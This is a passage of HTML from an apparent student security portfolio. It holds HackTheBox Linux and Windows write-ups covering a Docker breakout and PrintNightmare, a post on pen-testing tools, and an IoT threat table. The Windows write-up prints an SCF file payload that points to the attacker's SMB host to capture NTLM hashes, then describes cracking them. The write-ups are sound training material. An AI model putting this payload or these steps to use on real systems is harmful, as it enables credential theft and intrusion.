                "HostnamePath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/hostname",
                "HostsPath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/hosts",
                "Id":"47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216",
                "Image":"sha256:5c62e459e087e3bd3d963092b58e50ae2af881076b43c29e38e2b5db253e0287",
                "LogPath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216-json.log",
                "MountLabel":"",
                "Mounts":[
                   {
                      "Destination":"/docker-entrypoint-initdb.d",
                      "Mode":"ro",
                      "Propagation":"rprivate",
                      "RW":false,
                      "Source":"/root/app/scripts/init.d",
                      "Type":"bind"
                   },
                   {
                      "Destination":"/var/lib/mysql",
                      "Driver":"local",
                      "Mode":"rw",
                      "Name":"app_vol_mysql",
                      "Propagation":"",
                      "RW":true,
                      "Source":"/var/lib/docker/volumes/app_vol_mysql/_data",
                      "Type":"volume"
                   }
                ],
                "Name":"/mysql",
                "NetworkSettings":{
                   "Bridge":"",
                   "EndpointID":"",
                   "Gateway":"",
                   "GlobalIPv6Address":"",
                   "GlobalIPv6PrefixLen":0,
                   "HairpinMode":false,
                   "IPAddress":"",
                   "IPPrefixLen":0,
                   "IPv6Gateway":"",
                   "LinkLocalIPv6Address":"",
                   "LinkLocalIPv6PrefixLen":0,
                   "MacAddress":"",
                   "Networks":{
                      "app_nw":{
                         "Aliases":[
                            "47c78eb0450f",
                            "mysql"
                         ],
                         "DriverOpts":null,
                         "EndpointID":"50037fb137fd880f88a9efd17eb8cf94bf8142ec263080b4c904afeeaa79aa2e",
                         "Gateway":"172.18.0.1",
                         "GlobalIPv6Address":"",
                         "GlobalIPv6PrefixLen":0,
                         "IPAMConfig":{
                            "IPv4Address":"172.18.0.100"
                         },
                         "IPAddress":"172.18.0.100",
                         "IPPrefixLen":16,
                         "IPv6Gateway":"",
                         "Links":null,
                         "MacAddress":"02:42:ac:12:00:64",
                         "NetworkID":"021b24b8b3e1e3638463eeb7dc9af59c36cc412578cdf51931a24f04ea6f5532"
                      }
                   },
                   "Ports":{
                      "3306/tcp":null,
                      "33060/tcp":null
                   },
                   "SandboxID":"99cbb57fded2142e5dad46330b43249d2866f8514fb4342d06322f3e3b5c60f1",
                   "SandboxKey":"/var/run/docker/netns/99cbb57fded2",
                   "SecondaryIPAddresses":null,
                   "SecondaryIPv6Addresses":null
                },
                "Path":"docker-entrypoint.sh",
                "Platform":"linux",
                "ProcessLabel":"",
                "ResolvConfPath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/resolv.conf",
                "RestartCount":0,
                "State":{
                   "Dead":false,
                   "Error":"",
                   "ExitCode":0,
                   "FinishedAt":"0001-01-01T00:00:00Z",
                   "Health":{
                      "FailingStreak":0,
                      "Log":[
                         {
                            "End":"2021-10-04T17:08:01.998027574+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:01.908189033+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:07.080804898+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:07.000613396+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:12.166584919+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:12.083845791+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:17.254375293+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:17.16894306+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:22.350400823+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:22.257747436+02:00"
                         }
                      ],
                      "Status":"healthy"
                   },
                   "OOMKilled":false,
                   "Paused":false,
                   "Pid":1108,
                   "Restarting":false,
                   "Running":true,
                   "StartedAt":"2021-10-04T06:57:47.409835076Z",
                   "Status":"running"
                }
             },
             "status":200
          }
                                          </code>
                                      </pre>
          <p>Looks like an username and some passwords lets try those with ssh.</p>
          <a href="img/portfolio/minor/red/htb_linux/UserFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/UserFlag.png" alt=""></a>
          <p>We got the user flag! But now we need to find something to escalate our privileges. We
          could use LinPEAS to try and find something but we first have to get it on this
          machine.</p>
          <a href="img/portfolio/minor/red/htb_linux/SimpleHTTPServer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SimpleHTTPServer.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/WGETLinpeas.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WGETLinpeas.png" alt=""></a>
          <p>I used SimpleHTTPServer to get LinPeas from my machine to the target machine because the
          target machine didn't have access to the internet. Now we need to run LinPEAS.</p>
          <a href="img/portfolio/minor/red/htb_linux/LinpeasMail.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LinpeasMail.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/LinpeasDockerIP.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LinpeasDockerIP.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/LinpeasDockerFolder.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LinpeasDockerFolder.png" alt=""></a>
          <p>Looks like LinPEAS found some interesting stuff like a mail message to Drew and the
          docker ip ranges and a docker folder that is edited regularly.</p>
          <a href="img/portfolio/minor/red/htb_linux/Mail.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Mail.png" alt=""></a>
          <p>This probably means that the docker folder that gets edited regularly is the folder
          containing the game. And that some script is running that we could use.</p>
          <a href="img/portfolio/minor/red/htb_linux/DrewPublicKey.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DrewPublicKey.png" alt=""></a>
          <p>Looks like we got a public key as game-tester as well. Lets try to login into the docker
          ips using this public key.</p>
          <a href="img/portfolio/minor/red/htb_linux/Game-testerShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Game-testerShell.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/SharedFolderGame-tester.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SharedFolderGame-tester.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/SharedFolderDrew.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SharedFolderDrew.png" alt=""></a>
          <p>And it worked now we got a shell as game-tester as well on a docker container. I noticed
          that the same docker folder on Drew also exists on the docker container and that they
          are shared. I also noticed that the docker folder get rewritten entirely so all files
          inside get removed and replaced before the server is restarted again. Lets see what the
          script does.</p>
          <a href="img/portfolio/minor/red/htb_linux/CatNode-server.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CatNode-server.png" alt=""></a>
          <p>It runs in a folder called /usr/src/app which doesn't exist on the Drew user but it does
          on the game-tester container. So lets look at that as well.</p>
          <a href="img/portfolio/minor/red/htb_linux/CatServerJS.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CatServerJS.png" alt=""></a>
          <p>Look like we can crash the server if we make a POST to autoplay with a decimal instead of
          an integer. But that doesn't get us anywhere we need to infect the node-server.sh
          first.</p>
          <a href="img/portfolio/minor/red/htb_linux/DrewPublicKey.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DrewPublicKey.png" alt=""></a>
          <p>I found this <a href="https://book.hacktricks.xyz/linux-unix/privilege-escalation/docker-breakout">website</a>
          explaining priv esc with docker so I gave it a try. But I have to be faster than the
          server can create the node-server.sh in order to infect it. So I created a script.</p>
          <a href="img/portfolio/minor/red/htb_linux/RogueNode-server.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/RogueNode-server.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/ExploitLoop.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/ExploitLoop.png" alt=""></a>
          <p>This should create a bash file in /tmp on the game-tester container that is executable by
          game-tester in order to priv esc. So lets crash the server and try it.</p>
          <a href="img/portfolio/minor/red/htb_linux/ExploitRun.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/ExploitRun.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/CrashGameServer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CrashGameServer.png" alt=""></a>
          <p>I had to give it a few tries in order to succeed because in some cases the server was
          actually faster than my script.</p>
          <a href="img/portfolio/minor/red/htb_linux/RootOnDocker.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/RootOnDocker.png" alt=""></a>
          <p>And it worked now we need to do the same thing in order to get root on the Drew machine
          but this time we don't have to worry about speed because we don't need to infect a
          script, we just have to do it fast enough before all the files inside the folder get
          deleted again.</p>
          <a href="img/portfolio/minor/red/htb_linux/InfectBashAsGame-tester.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/InfectBashAsGame-tester.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/RootFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/RootFlag.png" alt=""></a>
          <p>That's it! We are root and got the flag!</p>
          <p>Although it took me quite a while to root this machine it was a really fun one.
          Containing a lot of different exploits mostly straight from the OWASP top 10 but also
          some I never heard of before like the docker priv esc.</p>
          <ul class="list-inline">
          <li>Date: October 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal22" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">HackTheBox Windows Write-up</p>
          <a href="img/portfolio/minor/red/htb_windows/DriverCard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/DriverCard.png" alt=""></a>
          <p>First lets start with the basic enumeration and do a NMap.</p>
          <a href="img/portfolio/minor/red/htb_windows/NMapOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/NMapOutput.png" alt=""></a>
          <p>When navigating to the webpage we are greeted by a login screen. After some searching and
          not finding anything useful I tried to login with just a default password admin:admin it
          was a longshot but it worked!</p>
          <a href="img/portfolio/minor/red/htb_windows/Dashboard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/Dashboard.png" alt=""></a>
          <p>The only button that worked on the website was Firmware updates where you can upload a
          file. Knowing that SMB was also an open port I found this <a href="https://pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/">website</a>
          this could potentially it so lets try it out.
          </p>
          <pre style="text-align: left">                                <code class="prettyprint">
                                              [Shell]
                                              Command=2
                                              Iconfile=\\10.10.14.161\share\test.ico
                                              [Taskbar]
                                              Command=ToggleDesktop
                                          </code>
                                      </pre>
          <a href="img/portfolio/minor/red/htb_windows/ResponderOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/ResponderOutput.png" alt=""></a>
          <p>I created a payload like the example given on the site I found started responder and got
          a few hits. Now we know the username and maybe the password if we manage to crack
          it. We know from the responder output that it is a NTLM hash so lets put Hashcat on it
          and see what we'll get.</p>
          <a href="img/portfolio/minor/red/htb_windows/HashcatOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/HashcatOutput.png" alt=""></a>
          <p>Hashcat cracked the password with ease and now we can take a look at the SMB folder to
          see if we can find anything interesting.</p>
          <a href="img/portfolio/minor/red/htb_windows/SMBMap.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/SMBMap.png" alt=""></a>
          <p>We didn't find anything interesting but knowing from the NMap output we also know that
          the RDP port is open so maybe it uses the same password.</p>
          <a href="img/portfolio/minor/red/htb_windows/UserFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/UserFlag.png" alt=""></a>
          <p>This was indeed the case and now we already have the user flag. For priv esc running at
          least WinPEAS is a no-brainer. So I used SimpleHTTPServer to get WinPEAS on the target
          machine.</p>
          <a href="img/portfolio/minor/red/htb_windows/SimpleHTTPServer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/SimpleHTTPServer.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_windows/WgetWinpeas.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/WgetWinpeas.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_windows/ProcessPrintSpool.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/ProcessPrintSpool.png" alt=""></a>
          <p>Really the only interesting thing WinPEAS found was a Print spooler process. After some
          Googling I stubled across <a href="https://github.com/calebstewart/CVE-2021-1675">this</a> CVE. So lets get
          that exploit on the target machine in the same way we did with WinPEAS.</p>
          <a href="img/portfolio/minor/red/htb_windows/WgetPrintNightmare.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/WgetPrintNightmare.png" alt=""></a>
          <p>I wasn't able to run the script because of some permission issues, but after some
          Googling I found out I could just set the policy to unrestricted.</p>
          <a href="img/portfolio/minor/red/htb_windows/RunExploit.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/RunExploit.png" alt=""></a>
          <p>I ran the exploit and it created a new administrator account for me with a username and
          password that I chose and know. Now the only thing that's left is just to logout as this
          user and login with our new user.</p>
          <a href="img/portfolio/minor/red/htb_windows/RootFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/RootFlag.png" alt=""></a>
          <p>And that's it! We have the root flag! This box wasn't that hard but still fun and
          sometimes challenging due to my lack of knowledge of Windows hacking. Overall a fun
          learning experience.</p>
          <ul class="list-inline">
          <li>Date: October 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal23" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal24" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal25" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">My personal pen-testing toolboxes</p>
          <p>Like every other profession good tools make a world of difference on the quality and
          efficiency of the end product. This isn't any different with cyber security. Good tools
          can improve results providing you with more information and helping with getting to the
          results faster.</p>
          <h3>On the road</h3>
          <a href="img/portfolio/minor/red/kalilinux.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/kalilinux.jpg" alt=""></a>
          <p>On the road when I'm on my laptop I like to use Kali Linux. It's just convenient that it
          comes pre-loaded with all the tools you need, and it runs fairly lightweight on older
          laptops. The "kali-undercover" command is also a fun little gimmick that changes your
          Kali desktop to a Windows clone which for a random passer by looks just like a regular
          Windows machine. Making it incognito to use Kali whenever you're in a public space and
          want to keep a low profile.</p>
          <h3>At home</h3>
          <a href="img/portfolio/minor/red/parrotos.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/parrotos.jpg" alt=""></a>
          <p>At home on my main desktop PC I recently switched to natively running ParrotOS. This was
          because I liked to try something new and the reviews were good. It comes pre-loaded with
          the same tools as kali and a few extra tools like diverting all traffic trough tor
          making the machine even more anonymous. The user experience is a little better and just
          overall a good looking distro. This comes at a cost because it takes more resources to
          run. This isn't a problem on my PC because it's quite powerful and I don't have to think
          about battery life. Alongside ParrotOS I run a Windows VM in qemu with WinApps running
          on Linux which enables me to run any Windows application I want on Linux. I mostly use
          it for Microsoft Office products.</p>
          <h3>Cloud</h3>
          <a href="img/portfolio/minor/red/googlecloudconsole.PNG"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/googlecloudconsole.PNG" alt=""></a>
          <p>Google cloud console is an awesome way to always have a Linux machine at your disposal
          where ever you are. It's fully cloud based and free to use. So when you're in need of a
          Linux terminal and you have access to a browser you're set. The only downside is that
          the machine is volatile so when you shut it down it is gone. This requires you to always
          re-install tools and such. Luckily due to it running on Google cloud it is pretty fast.
          Just overall a good tool to know about.</p>
          <a href="img/portfolio/minor/red/guacamole.PNG"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/guacamole.PNG" alt=""></a>
          <p>Now Guacamole is kinda like Google cloud console, but it's self-hosted. It can turn any
          machine with a SSH server into a cloud based web terminal accessible from any browser
          where ever you are. It takes a little time and effort to set it up but it is worth it.
          All the benefits from Google cloud console but your data is hosted by you and it is
          saved. In my case I installed Kali Linux on a docker server and now I can access it
          whenever I need to it doesn't matter if I'm on Windows, Linux or even my phone.</p>
          <a href="img/portfolio/minor/red/guacamoleconsole.PNG"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/guacamoleconsole.PNG" alt=""></a>
          <h3>Windows</h3>
          <a href="img/portfolio/minor/red/wsl.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/wsl.jpg" alt=""></a>
          <p>Whenever I'm using Windows and need to do a quick little task that requires Linux I don't
          want to reboot and boot into Linux because it's a hassle. That's when I use WSL. WSL
          stands for Windows Subsystem for Linux and it works great. It's not everything for
          example network related stuff is not possible due to WSL not having direct access to the
          network card but for other simple stuff it works great. And if I need to do a quick
          little scan I can use the Windows version of NMap. And if I need a little more
          functionality I can always use the before mentioned Guacamole to have instant access to
          a fully functional Kali instance in my browser.</p>
          <ul class="list-inline">
          <li>Date: September 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal26" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">Security of IOT protocols and technology</p>
          <p>Nowadays more and more people have their home filled with smart devices. Almost
          everything is smart in some way. Which creates new problems like security. These
          products weren't made with security in mind, on the contrary, they were made to be cheap
          and easy to use for people without IT knowledge.</p>
          <p>This causes IOT products to be, the most of the time, the weakest link in someones
          network. But IOT is here to stay and it is improving fast so let's take a look at some
          common security protocols.</p>
          <table>
          <tr>
          <th>Protocol</th>
          <th>Feature</th>
          <th>TCP/UDP</th>
          <th>Security</th>
          </tr>
          <tr>
          <td>LOWPAN</td>
          <td>WPANs to maintain an IPv6 network</td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>MQTT</td>
          <td>To utilize the publish/subscribe pattern to provide transition flexibility and
          simplicity of implementation
          </td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>AMQP</td>
          <td>To provide publish-subscribe and point-to point communication</td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>CoAP</td>
          <td>To connect resource-constrained devices in a secure and reliable way</td>
          <td>UDP</td>
          <td>DTLS</td>
          </tr>
          <tr>
          <td>XMPP</td>
          <td>To transfer instant messaging (IM) standard that is used for multi-party
          chatting, voice and video calling and telepresence
          </td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>DSS</td>
          <td>To enable scalable, real-time, dependable, high-performance and interoperable
          data exchanges using a publish–subscribe pattern
          </td>
          <td>TCP/UDP</td>
          <td>SSL</td>
          </tr>
          </table>
          <p>To show the security flaws in IOT devices</p>
          <table>
          <thead>
          <tr class="rowsep-1 valign-top">
          <th scope="col">Layers</th>
          <th scope="col">Attacks</th>
          <th scope="col">Issues</th>
          <th scope="col">Control Measures</th>
          </tr>
          </thead>
          <tbody>
          <tr class="valign-top">
          <td class="align-left" rowspan="6">Perception</td>
          <td class="align-left">Hardware Tempering</td>
          <td class="align-left">Data Leakage (Keys, Routing Tables, Etc)</td>
          <td class="align-left">Secure Physical Design</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Fake Node Injection</td>
          <td class="align-left">Fake Data Manipulation</td>
          <td class="align-left">Secure Booting</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Malicious Code Injection</td>
           <td class="align-left">Halt Transmission</td>
          <td class="align-left">Intrusion Detection Technology (IDT)</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Sleep Denial Attack</td>
          <td class="align-left">Node Shutdown</td>
          <td class="align-left">Authentication</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">WSN Node Jamming</td>
          <td class="align-left">Jam Node Communication</td>
          <td class="align-left">IPSec Security Channel</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">RF Interference Of RFID</td>
          <td class="align-left">Distortion In Node Communication</td>
          <td class="align-left">Authentication</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left" rowspan="12">Network</td>
          <td class="align-left">Traffic Analysis Attacks</td>
          <td class="align-left">Data Leakage (About Network)</td>
          <td class="align-left">Routing Security</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">RFID Spoofing</td>
          <td class="align-left">Intrusion In Network Data Manipulation</td>
          <td class="align-left">GPS Location System</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">RFID Unauthorized Access</td>
          <td class="align-left">Node Data Can Be Modified (Read, Write &amp; Delete)</td>
          <td class="align-left">Network Authentication</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Sinkhole Attack</td>
          <td class="align-left">Data Leakage (Data Of The Nodes)</td>
          <td class="align-left">Security Aware Ad Hoc Routing</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Man In The Middle Attack</td>
          <td class="align-left">Data Privacy Violation</td>
          <td class="align-left">Point-To-Point Encryption</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Routing Information Attack</td>
          <td class="align-left">Routing Loops (Network Destruction)</td>
          <td class="align-left">Encrypting Routing Tables</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Application Security</td>
          <td class="align-left">Privacy Violation</td>
          <td class="align-left">Web Application Scanner</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Data Security</td>
           <td class="align-left">Data Leakage (User Data On Cloud)</td>
          <td class="align-left">Homomorphic Encryption</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Underlying Infrastructure Security</td>
          <td class="align-left">Service Hijacking</td>
          <td class="align-left">Fragmentation Redundancy Scattering</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Third-Party Relationships</td>
          <td class="align-left">Data Leakage (User Data On Cloud)</td>
          <td class="align-left">Encryption</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Shared Resources</td>
          <td class="align-left">Resources Destruction</td>
          <td class="align-left">Hyper Safe</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Virtualization Threats</td>
          <td class="align-left">Resources Theft</td>
          <td class="align-left">Hyper Safe</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left" rowspan="6">Application</td>
          <td class="align-left">Phishing Attacks</td>
          <td class="align-left">Data Leakage (User Credentials Data)</td>
          <td class="align-left">Biometrics Authentication</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Virus, Worms, Trojan Horse, Spyware</td>
          <td class="align-left">Resource Destruction &amp; Hijacking</td>
          <td class="align-left">Protective Software</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Malicious Scripts</td>
          <td class="align-left">Hijacking</td>
          <td class="align-left">Firewalls</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Denial Of Service</td>
          <td class="align-left">Resource Destruction</td>
          <td class="align-left">Access Control Lists</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Data Protection And Recovery</td>
          <td class="align-left">Data Loss &amp; Catastrophic Damage</td>
          <td class="align-left">Cryptographic Hash Functions</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Software Vulnerabilities</td>
          <td class="align-left">Buffer Over Flow</td>
          <td class="align-left">Awareness Of Security</td>
          </tr>
          </tbody>
          </table>
          <a href="https://www.sciencedirect.com/science/article/pii/S108480452030237X#sec3">Source</a>
           <p>As seen in this article there are a lot of different vulnerabilities in IOT devices. And
          not all of them can be solved with just a good security protocol.</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: November 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal27" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal28" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
